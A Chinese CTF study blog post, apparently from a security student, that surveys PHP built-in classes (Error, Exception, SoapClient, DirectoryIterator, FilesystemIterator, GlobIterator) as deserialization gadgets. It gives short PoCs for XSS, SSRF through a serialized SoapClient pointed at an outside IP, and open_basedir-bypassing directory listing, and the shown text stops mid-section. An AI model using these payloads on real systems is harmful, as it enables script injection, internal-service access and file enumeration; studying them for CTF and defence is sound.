

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="p0l1">
  <meta name="keywords" content="">
  
    <meta name="description" content="前言新生赛遇到了一道题需要利用PHP原生类，由于自己很菜，花了很长时间才做出来。趁周末有时间总结一下常见的PHP原生类  Error Exception SoapClient Directorylterator SimpleXMLElement  Error&#x2F;ExceptionError 适用于php7 开启报错  Error类类摘要 1234567891011121314151617E">
<meta property="og:type" content="article">
<meta property="og:title" content="php原生类">
<meta property="og:url" content="http://example.com/2023/12/15/php%E5%8E%9F%E7%94%9F%E7%B1%BB/index.html">
<meta property="og:site_name" content="p0l1st&#39;s blog">
<meta property="og:description" content="前言新生赛遇到了一道题需要利用PHP原生类，由于自己很菜，花了很长时间才做出来。趁周末有时间总结一下常见的PHP原生类  Error Exception SoapClient Directorylterator SimpleXMLElement  Error&#x2F;ExceptionError 适用于php7 开启报错  Error类类摘要 1234567891011121314151617E">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/images/image-20231215153028854.png">
<meta property="og:image" content="http://example.com/images/image-20231215153244269.png">
<meta property="og:image" content="http://example.com/images/image-20231215161339993.png">
<meta property="og:image" content="http://example.com/images/20210809203839.png">
<meta property="og:image" content="http://example.com/images/image-20231215162830705.png">
<meta property="og:image" content="http://example.com/images/image-20231215162844688.png">
<meta property="article:published_time" content="2023-12-15T09:24:45.000Z">
<meta property="article:modified_time" content="2023-12-15T09:27:05.884Z">
<meta property="article:author" content="p0l1">
<meta property="article:tag" content="php">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/images/image-20231215153028854.png">
  
  
  
  <title>php原生类 - p0l1st&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.6","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>p0l1st</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="php原生类"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-12-15 17:24" pubdate>
          December 15, 2023 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          522 words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          5 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">php原生类</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>新生赛遇到了一道题需要利用PHP原生类，由于自己很菜，花了很长时间才做出来。趁周末有时间总结一下常见的PHP原生类</p>
<ul>
<li>Error</li>
<li>Exception</li>
<li>SoapClient</li>
<li>Directorylterator</li>
<li>SimpleXMLElement</li>
</ul>
<h1 id="Error-Exception"><a href="#Error-Exception" class="headerlink" title="Error&#x2F;Exception"></a>Error&#x2F;Exception</h1><h2 id="Error"><a href="#Error" class="headerlink" title="Error"></a>Error</h2><ul>
<li>适用于php7</li>
<li>开启报错</li>
</ul>
<h3 id="Error类"><a href="#Error类" class="headerlink" title="Error类"></a>Error类</h3><p><strong>类摘要</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-built_in">Error</span> <span class="hljs-keyword">implements</span> <span class="hljs-built_in">Throwable</span> &#123;<br>    <span class="hljs-comment">/* 属性 */</span><br>    <span class="hljs-keyword">protected</span> <span class="hljs-keyword">string</span> <span class="hljs-variable">$message</span> ;<br>    <span class="hljs-keyword">protected</span> <span class="hljs-keyword">int</span> <span class="hljs-variable">$code</span> ;<br>    <span class="hljs-keyword">protected</span> <span class="hljs-keyword">string</span> <span class="hljs-variable">$file</span> ;<br>    <span class="hljs-keyword">protected</span> <span class="hljs-keyword">int</span> <span class="hljs-variable">$line</span> ;<br>    <span class="hljs-comment">/* 方法 */</span><br>    <span class="hljs-keyword">public</span> <span class="hljs-title function_ invoke__">__construct</span> ( <span class="hljs-keyword">string</span> <span class="hljs-variable">$message</span> = <span class="hljs-string">&quot;&quot;</span> , <span class="hljs-keyword">int</span> <span class="hljs-variable">$code</span> = <span class="hljs-number">0</span> , <span class="hljs-built_in">Throwable</span> <span class="hljs-variable">$previous</span> = <span class="hljs-literal">null</span> )<br>    <span class="hljs-keyword">final</span> <span class="hljs-keyword">public</span> <span class="hljs-title function_ invoke__">getMessage</span> ( ) : <span class="hljs-keyword">string</span><br>    <span class="hljs-keyword">final</span> <span class="hljs-keyword">public</span> <span class="hljs-title function_ invoke__">getPrevious</span> ( ) : <span class="hljs-built_in">Throwable</span><br>    <span class="hljs-keyword">final</span> <span class="hljs-keyword">public</span> <span class="hljs-title function_ invoke__">getCode</span> ( ) : <span class="hljs-keyword">mixed</span><br>    <span class="hljs-keyword">final</span> <span class="hljs-keyword">public</span> <span class="hljs-title function_ invoke__">getFile</span> ( ) : <span class="hljs-keyword">string</span><br>    <span class="hljs-keyword">final</span> <span class="hljs-keyword">public</span> <span class="hljs-title function_ invoke__">getLine</span> ( ) : <span class="hljs-keyword">int</span><br>    <span class="hljs-keyword">final</span> <span class="hljs-keyword">public</span> <span class="hljs-title function_ invoke__">getTrace</span> ( ) : <span class="hljs-keyword">array</span><br>    <span class="hljs-keyword">final</span> <span class="hljs-keyword">public</span> <span class="hljs-title function_ invoke__">getTraceAsString</span> ( ) : <span class="hljs-keyword">string</span><br>    <span class="hljs-keyword">public</span> <span class="hljs-title function_ invoke__">__toString</span> ( ) : <span class="hljs-keyword">string</span><br> <br></code></pre></td></tr></table></figure>

<p><strong>类属性</strong></p>
<ul>
<li>message：错误消息内容</li>
<li>code：错误代码</li>
<li>file：抛出错误的文件名</li>
<li>line：抛出错误在该文件中的行数</li>
</ul>
<p><strong>类方法</strong></p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/error.construct.php"><code>Error::__construct</code></a> — 初始化 error 对象</li>
<li><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/error.getmessage.php"><code>Error::getMessage</code></a> — 获取错误信息</li>
<li><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/error.getprevious.php"><code>Error::getPrevious</code></a> — 返回先前的 Throwable</li>
<li><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/error.getcode.php"><code>Error::getCode</code></a> — 获取错误代码</li>
<li><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/error.getfile.php"><code>Error::getFile</code></a> — 获取错误发生时的文件</li>
<li><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/error.getline.php"><code>Error::getLine</code></a> — 获取错误发生时的行号</li>
<li><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/error.gettrace.php"><code>Error::getTrace</code></a> — 获取调用栈（stack trace）</li>
<li><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/error.gettraceasstring.php"><code>Error::getTraceAsString</code></a> — 获取字符串形式的调用栈（stack trace）</li>
<li><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/error.tostring.php"><code>Error::__toString</code></a> — error 的字符串表达</li>
<li><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/error.clone.php"><code>Error::__clone</code></a> — 克隆 error</li>
</ul>
<h3 id="使用Error内置类来构造xss"><a href="#使用Error内置类来构造xss" class="headerlink" title="使用Error内置类来构造xss"></a>使用Error内置类来构造xss</h3><p>Error类是php的一个内置类，用于自定义一个Error。由于它内置的__toString()方法，在php7下可能造成xss，常用于反序列化中。</p>
<p>当php对象被当作字符串输出时，会触发__toString方法</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$a</span> = <span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;whoami&#x27;</span>]);<br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$a</span>;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>PoC</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$a</span> = <span class="hljs-keyword">new</span> <span class="hljs-built_in">Error</span>(<span class="hljs-string">&quot;&lt;script&gt;alert(&#x27;xss&#x27;)&lt;/script&gt;&quot;</span>);<br><span class="hljs-variable">$b</span> = <span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$a</span>);<br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">urlencode</span>(<span class="hljs-variable">$b</span>);  <br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p><img src="/../images/image-20231215153028854.png" srcset="/img/loading.gif" lazyload alt="image-20231215153028854"></p>
<h2 id="Exception"><a href="#Exception" class="headerlink" title="Exception"></a>Exception</h2><ul>
<li>适用于php5、7</li>
<li>开启报错</li>
</ul>
<h3 id="Exception类"><a href="#Exception类" class="headerlink" title="Exception类"></a>Exception类</h3><p><strong>类摘要</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-built_in">Exception</span> &#123;<br>    <span class="hljs-comment">/* 属性 */</span><br>    <span class="hljs-keyword">protected</span> <span class="hljs-keyword">string</span> <span class="hljs-variable">$message</span> ;<br>    <span class="hljs-keyword">protected</span> <span class="hljs-keyword">int</span> <span class="hljs-variable">$code</span> ;<br>    <span class="hljs-keyword">protected</span> <span class="hljs-keyword">string</span> <span class="hljs-variable">$file</span> ;<br>    <span class="hljs-keyword">protected</span> <span class="hljs-keyword">int</span> <span class="hljs-variable">$line</span> ;<br>    <span class="hljs-comment">/* 方法 */</span><br>    <span class="hljs-keyword">public</span> <span class="hljs-title function_ invoke__">__construct</span> ( <span class="hljs-keyword">string</span> <span class="hljs-variable">$message</span> = <span class="hljs-string">&quot;&quot;</span> , <span class="hljs-keyword">int</span> <span class="hljs-variable">$code</span> = <span class="hljs-number">0</span> , <span class="hljs-built_in">Throwable</span> <span class="hljs-variable">$previous</span> = <span class="hljs-literal">null</span> )<br>    <span class="hljs-keyword">final</span> <span class="hljs-keyword">public</span> <span class="hljs-title function_ invoke__">getMessage</span> ( ) : <span class="hljs-keyword">string</span><br>    <span class="hljs-keyword">final</span> <span class="hljs-keyword">public</span> <span class="hljs-title function_ invoke__">getPrevious</span> ( ) : <span class="hljs-built_in">Throwable</span><br>    <span class="hljs-keyword">final</span> <span class="hljs-keyword">public</span> <span class="hljs-title function_ invoke__">getCode</span> ( ) : <span class="hljs-keyword">mixed</span><br>    <span class="hljs-keyword">final</span> <span class="hljs-keyword">public</span> <span class="hljs-title function_ invoke__">getFile</span> ( ) : <span class="hljs-keyword">string</span><br>    <span class="hljs-keyword">final</span> <span class="hljs-keyword">public</span> <span class="hljs-title function_ invoke__">getLine</span> ( ) : <span class="hljs-keyword">int</span><br>    <span class="hljs-keyword">final</span> <span class="hljs-keyword">public</span> <span class="hljs-title function_ invoke__">getTrace</span> ( ) : <span class="hljs-keyword">array</span><br>    <span class="hljs-keyword">final</span> <span class="hljs-keyword">public</span> <span class="hljs-title function_ invoke__">getTraceAsString</span> ( ) : <span class="hljs-keyword">string</span><br>    <span class="hljs-keyword">public</span> <span class="hljs-title function_ invoke__">__toString</span> ( ) : <span class="hljs-keyword">string</span><br>    <span class="hljs-keyword">final</span> <span class="hljs-keyword">private</span> <span class="hljs-title function_ invoke__">__clone</span> ( ) : <span class="hljs-keyword">void</span><br>&#125;<br></code></pre></td></tr></table></figure>

<p><strong>类属性</strong></p>
<ul>
<li>message：错误消息内容</li>
<li>code：错误代码</li>
<li>file：抛出错误的文件名</li>
<li>line：抛出错误在该文件中的行数</li>
</ul>
<p><strong>类方法</strong></p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/exception.construct.php"><code>Exception::__construct</code></a> — 异常构造函数</li>
<li><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/exception.getmessage.php"><code>Exception::getMessage</code></a> — 获取异常消息内容</li>
<li><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/exception.getprevious.php"><code>Exception::getPrevious</code></a> — 返回异常链中的前一个异常</li>
<li><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/exception.getcode.php"><code>Exception::getCode</code></a> — 获取异常代码</li>
<li><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/exception.getfile.php"><code>Exception::getFile</code></a> — 创建异常时的程序文件名称</li>
<li><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/exception.getline.php"><code>Exception::getLine</code></a> — 获取创建的异常所在文件中的行号</li>
<li><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/exception.gettrace.php"><code>Exception::getTrace</code></a> — 获取异常追踪信息</li>
<li><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/exception.gettraceasstring.php"><code>Exception::getTraceAsString</code></a> — 获取字符串类型的异常追踪信息</li>
<li><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/exception.tostring.php"><code>Exception::__toString</code></a> — 将异常对象转换为字符串</li>
<li><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/exception.clone.php"><code>Exception::__clone</code></a> — 异常克隆</li>
</ul>
<h3 id="使用Exception类构造xss"><a href="#使用Exception类构造xss" class="headerlink" title="使用Exception类构造xss"></a>使用Exception类构造xss</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$a</span> = <span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;whoami&#x27;</span>]);<br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$a</span>;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>PoC</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$a</span> = <span class="hljs-keyword">new</span> <span class="hljs-built_in">Exception</span>(<span class="hljs-string">&quot;&lt;script&gt;alert(&#x27;xss&#x27;)&lt;/script&gt;&quot;</span>);<br><span class="hljs-variable">$b</span> = <span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$a</span>);<br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">urlencode</span>(<span class="hljs-variable">$b</span>);  <br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p><img src="/../images/image-20231215153244269.png" srcset="/img/loading.gif" lazyload alt="image-20231215153244269"></p>
<h1 id="SoapClient"><a href="#SoapClient" class="headerlink" title="SoapClient"></a>SoapClient</h1><p>SoapClinet是一个专门用来访问web服务的类，可以提供一个基于SOAP协议访问web服务的PHP客户端</p>
<p><strong>类摘要</strong></p>
<figure class="highlight smali"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs smali">SoapClient &#123;<br>    /* 方法 */<br>   <span class="hljs-keyword"> public</span> __construct ( string|null $wsdl ,<span class="hljs-built_in"> array </span>$options = [] )<br>   <span class="hljs-keyword"> public</span> __call ( string $name ,<span class="hljs-built_in"> array </span>$args )<span class="hljs-keyword"> :</span> mixed<br>   <span class="hljs-keyword"> public</span> __doRequest ( string $request , string $location , string $action ,<span class="hljs-built_in"> int </span>$version , bool $oneWay = false )<span class="hljs-keyword"> :</span> string|null<br>   <span class="hljs-keyword"> public</span> __getCookies ( )<span class="hljs-keyword"> :</span><span class="hljs-built_in"> array</span><br><span class="hljs-built_in"></span>   <span class="hljs-keyword"> public</span> __getFunctions ( )<span class="hljs-keyword"> :</span> array|null<br>   <span class="hljs-keyword"> public</span> __getLastRequest ( )<span class="hljs-keyword"> :</span> string|null<br>   <span class="hljs-keyword"> public</span> __getLastRequestHeaders ( )<span class="hljs-keyword"> :</span> string|null<br>   <span class="hljs-keyword"> public</span> __getLastResponse ( )<span class="hljs-keyword"> :</span> string|null<br>   <span class="hljs-keyword"> public</span> __getLastResponseHeaders ( )<span class="hljs-keyword"> :</span> string|null<br>   <span class="hljs-keyword"> public</span> __getTypes ( )<span class="hljs-keyword"> :</span> array|null<br>   <span class="hljs-keyword"> public</span> __setCookie ( string $name , string|null $value = null )<span class="hljs-keyword"> :</span> void<br>   <span class="hljs-keyword"> public</span> __setLocation ( string $location = <span class="hljs-string">&quot;&quot;</span> )<span class="hljs-keyword"> :</span> string|null<br>   <span class="hljs-keyword"> public</span> __setSoapHeaders ( SoapHeader|array|null $headers = null )<span class="hljs-keyword"> :</span> bool<br>   <span class="hljs-keyword"> public</span> __soapCall ( string $name ,<span class="hljs-built_in"> array </span>$args , array|null $options = null , SoapHeader|array|null $inputHeaders = null ,<span class="hljs-built_in"> array </span>&amp;$outputHeaders = null )<span class="hljs-keyword"> :</span> mixed<br>&#125;<br></code></pre></td></tr></table></figure>

<p>当__call方法被触发后，可以发送http和https请求。</p>
<p>该类构造函数如下</p>
<figure class="highlight lasso"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs lasso"><span class="hljs-keyword">public</span> SoapClient <span class="hljs-type">:: SoapClient</span>(mixed $wsdl <span class="hljs-meta">[</span>，<span class="hljs-built_in">array</span> $options <span class="hljs-meta">]</span>)<br></code></pre></td></tr></table></figure>

<ul>
<li>第一个参数用来指明是否是wsdl模式，将该值设为null则表示非wsdl模式</li>
<li>第二个参数为一个数组，如果在wsdl模式下，该参数可选；如果在非wsdl模式下，则必须设置location和uri选项，其中location是将请求发送到SOAP服务器的URL，uri则是SOAP服务的目标命名空间。</li>
</ul>
<p>payload:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$a</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">SoapClient</span>(<span class="hljs-literal">null</span>,<span class="hljs-keyword">array</span>(<span class="hljs-string">&#x27;location&#x27;</span>=&gt;<span class="hljs-string">&#x27;http://47.xxx.xxx.72:2333/aaa&#x27;</span>, <span class="hljs-string">&#x27;uri&#x27;</span>=&gt;<span class="hljs-string">&#x27;http://47.xxx.xxx.72:2333&#x27;</span>));<br><span class="hljs-variable">$b</span> = <span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$a</span>);<br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$b</span>;<br><span class="hljs-variable">$c</span> = <span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$b</span>);<br><span class="hljs-variable">$c</span>-&gt;<span class="hljs-title function_ invoke__">a</span>();    <span class="hljs-comment">// 随便调用对象中不存在的方法, 触发__call方法进行ssrf</span><br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>由于环境问题，没有用nc演示</p>
<h1 id="Directorylterator"><a href="#Directorylterator" class="headerlink" title="Directorylterator"></a>Directorylterator</h1><p>Directorylterator类提供了一个用于查看文件系统目录内容的简单接口</p>
<p>Directorylterator与glob:&#x2F;&#x2F;协议结合将无视open_basedir对目录的限制，可用来列举指定目录下的文件</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$dir</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;whoami&#x27;</span>];<br><span class="hljs-variable">$a</span> = <span class="hljs-keyword">new</span> <span class="hljs-built_in">DirectoryIterator</span>(<span class="hljs-variable">$dir</span>);<br><span class="hljs-keyword">foreach</span>(<span class="hljs-variable">$a</span> <span class="hljs-keyword">as</span> <span class="hljs-variable">$f</span>)&#123;<br>    <span class="hljs-keyword">echo</span>(<span class="hljs-variable">$f</span>-&gt;<span class="hljs-title function_ invoke__">__toString</span>().<span class="hljs-string">&#x27;&lt;br&gt;&#x27;</span>);<br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>输入?whoami&#x3D;glob:&#x2F;&#x2F;&#x2F;*即可列出根目录下的文件</p>
<p><img src="/../images/image-20231215161339993.png" srcset="/img/loading.gif" lazyload alt="image-20231215161339993"></p>
<h1 id="Filesystemlterator"><a href="#Filesystemlterator" class="headerlink" title="Filesystemlterator"></a>Filesystemlterator</h1><p>与Directorylterator类相同，提供了一个用于查看文件系统目录内容的简单接口</p>
<p>该类的构造方法将会创建一个指定目录的迭代器</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$dir</span>=<span class="hljs-keyword">new</span> <span class="hljs-built_in">FilesystemIterator</span>(<span class="hljs-string">&quot;/&quot;</span>);<br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$dir</span>;<br></code></pre></td></tr></table></figure>

<h1 id="Globlterator"><a href="#Globlterator" class="headerlink" title="Globlterator"></a>Globlterator</h1><p>与filesystemlterator和directorylterator作用类似，也可以遍历一个文件目录，使用方法与前两个也类似</p>
<p>不同的是其行为类似glob()，可以通过模式匹配来寻找文件路径</p>
<p><strong>类摘要</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-built_in">GlobIterator</span> <span class="hljs-keyword">extends</span> <span class="hljs-built_in">FilesystemIterator</span> <span class="hljs-keyword">implements</span> <span class="hljs-built_in">SeekableIterator</span> , <span class="hljs-built_in">Countable</span> &#123;<br>    <span class="hljs-comment">/* 方法 */</span><br>    <span class="hljs-keyword">public</span> <span class="hljs-title function_ invoke__">__construct</span> ( <span class="hljs-keyword">string</span> <span class="hljs-variable">$pattern</span> , <span class="hljs-keyword">int</span> <span class="hljs-variable">$flags</span> = <span class="hljs-title class_">FilesystemIterator</span>::<span class="hljs-variable constant_">KEY_AS_PATHNAME</span> | <span class="hljs-title class_">FilesystemIterator</span>::<span class="hljs-variable constant_">CURRENT_AS_FILEINFO</span> )<br>    <span class="hljs-keyword">public</span> <span class="hljs-title function_ invoke__">count</span> ( ) : <span class="hljs-keyword">int</span><br>    <span class="hljs-comment">/* 继承的方法 */</span><br>    <span 